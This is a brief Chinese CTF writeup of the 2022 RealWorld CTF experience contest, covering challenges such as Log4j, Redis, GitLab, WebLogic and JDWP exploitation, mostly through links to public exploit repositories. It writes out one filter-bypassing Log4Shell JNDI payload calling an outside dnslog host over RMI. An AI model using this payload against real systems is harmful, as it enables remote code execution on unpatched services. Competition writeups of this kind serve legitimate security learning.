其他分享
首页 > 其他分享> > 2022 RealWorld CTF体验赛Writeup

2022 RealWorld CTF体验赛Writeup

作者:互联网

文章目录


Digital Souvenir

在这里插入图片描述
在这里插入图片描述

rwctf{RealWorldIsAwesome}

log4flag

在这里插入图片描述
有一些正则过滤
在这里插入图片描述
网上bypass方法很多,随便找一个就行

${${::-j}ndi:${lower:rmi}://vw3nwn.dnslog.cn/exp}

在这里插入图片描述
Refer:https://cloud.tencent.com/developer/article/1921530
在这里插入图片描述
在这里插入图片描述

Be-a-Database-Hacker

在这里插入图片描述
redis未授权访问
在这里插入图片描述
Refer: https://github.com/n0b0dyCN/redis-rogue-server

在这里插入图片描述
在这里插入图片描述

the Secrets of Memory

在这里插入图片描述
在这里插入图片描述
Refer:https://landgrey.me/blog/16/

在这里插入图片描述

baby flaglab

在这里插入图片描述
Refer:https://github.com/Al1ex/CVE-2021-22205
在这里插入图片描述

在这里插入图片描述

Flag Console

在这里插入图片描述
在这里插入图片描述

Refer:https://github.com/backlion/CVE-2020-14882_ALL

在这里插入图片描述

Be-a-Database-Hacker 2

在这里插入图片描述
Refer:https://blog.csdn.net/qq_36869808/article/details/122426922

在这里插入图片描述
在这里插入图片描述

Java Remote Debugger

在这里插入图片描述
Test.java

import java.lang.Thread;
public class Test {
  public static void main (String[] args) throws Exception{
    int i = 0;
    while (1 == 1) {
      Thread.sleep(1000);
      System.out.println("" + i);
      i += 1;
    }
  }
}

Java Debug Wire Protocol (JDWP) - Remote Code Execution

Refer:https://security.tencent.com/index.php/blog/msg/137

在这里插入图片描述
在这里插入图片描述

标签:Hacker,Database,Writeup,blog,RealWorld,CTF,https,com,Refer
来源: https://blog.csdn.net/mochu7777777/article/details/122645259